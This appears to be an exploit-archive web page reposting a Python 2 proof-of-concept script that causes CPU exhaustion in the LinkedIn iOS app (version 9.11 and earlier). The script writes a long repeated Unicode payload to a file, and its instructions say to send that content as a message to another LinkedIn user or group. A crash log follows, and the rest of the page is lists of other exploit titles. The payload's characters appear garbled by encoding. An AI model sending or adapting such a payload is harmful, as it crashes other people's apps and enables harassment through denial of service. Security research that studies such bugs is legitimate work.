首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linkedin iOS 9.11.8592.4 CPU Resource Exhaustion
来源:http://www.kpn.com 作者:Sacco 发布时间:2018-08-03  
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team -
http://www.kpn.com
# Linkedin Mobile iOS - v9.11 < CPU Resource exhaustion
#
# Found this and more exploits at my open source security project:
http://www.exploitpack.com
# Date and time of release: 2 August 2018
#
# How to use:
# Run the script and copy the content of the file, send it as a
message to another Linkedin user.
#
# Description:
# Linkedin Mobile iOS v9.11 and prior are affected. The application fails to
# properly filter user-supplied input and its prone to a remote cpu exhaustion.
# This exploits use the same bug discovered for WhatsApp:
https://www.exploit-db.com/exploits/43107/
#
# OS Version:      iPhone OS 11.4.1 (Build 15G77)
# Architecture:    arm64
# Report Version:  19
# Hardware model:  iPhone7,1
# Action taken: Process killed
# CPU: 48s seconds cpu time over 62 seconds ( 93% cpu average ),
exceeding limit of 80% cpu over 60 seconds.
# Active cpus:     2
#  49 ??? (libdyld.dylib + 4032) [0x182e0dfc0]
#    49 ??? (LinkedIn + 213856) [0x100c04360]
#      49 ??? (UIKit + 3266392) [0x18d39c758]
#        49 ??? (GraphicsServices + 45088) [0x185362020]
#          49 ??? (CoreFoundation + 48552) [0x18337cda8]
import sys
reload(sys)

def linkedin(filename):
    sys.setdefaultencoding("utf-8")
    payload = u'O" O(c) Oa O<< O! O O(r) O- Odeg O+- O2 O3 O' Ou OP O* O, O1 Oo U U U U U U' * 158
    sutf8 = payload.encode('UTF-8')
    print "[*] Writing to file: " + filename
    open(filename, 'w').write(payload)
    print "[*] Done."

def howtouse():
    print "Usage: linkedin.py [FILENAME]"
    print "[*] Mandatory arguments:"
    print "[!] FILENAME"
    sys.exit(-1)

if __name__ == "__main__":
    try:
        print "[*] Linkedin iOS 9.11.8592.4 iOS - CPU Resource
exhaustion by Juan Sacco"
        print "[*] How to use: Copy the content of the file and send
it as a message to another linkedin user or group"
        linkedin(sys.argv[1])
    except IndexError:
        howtouse()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AgataSoft Auto PingMaster 1.5
·Seq 4.2.476 Authentication Byp
·SecureSphere 12.0.0.50 - SealM
·Linux Kernel UDP Fragmentation
·CoSoSys Endpoint Protector 4.5
·Fortinet FortiClient 5.2.3 (Wi
·Imperva SecureSphere 11.5 / 12
·Wedding Slideshow Studio 1.36
·Sun Solaris 11.3 AVS - Local K
·OpenEMR < 5.0.1 - Remote Code
·Allok Fast AVI MPEG Splitter 1
·QNap QVR Client 5.0.3.23100 -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved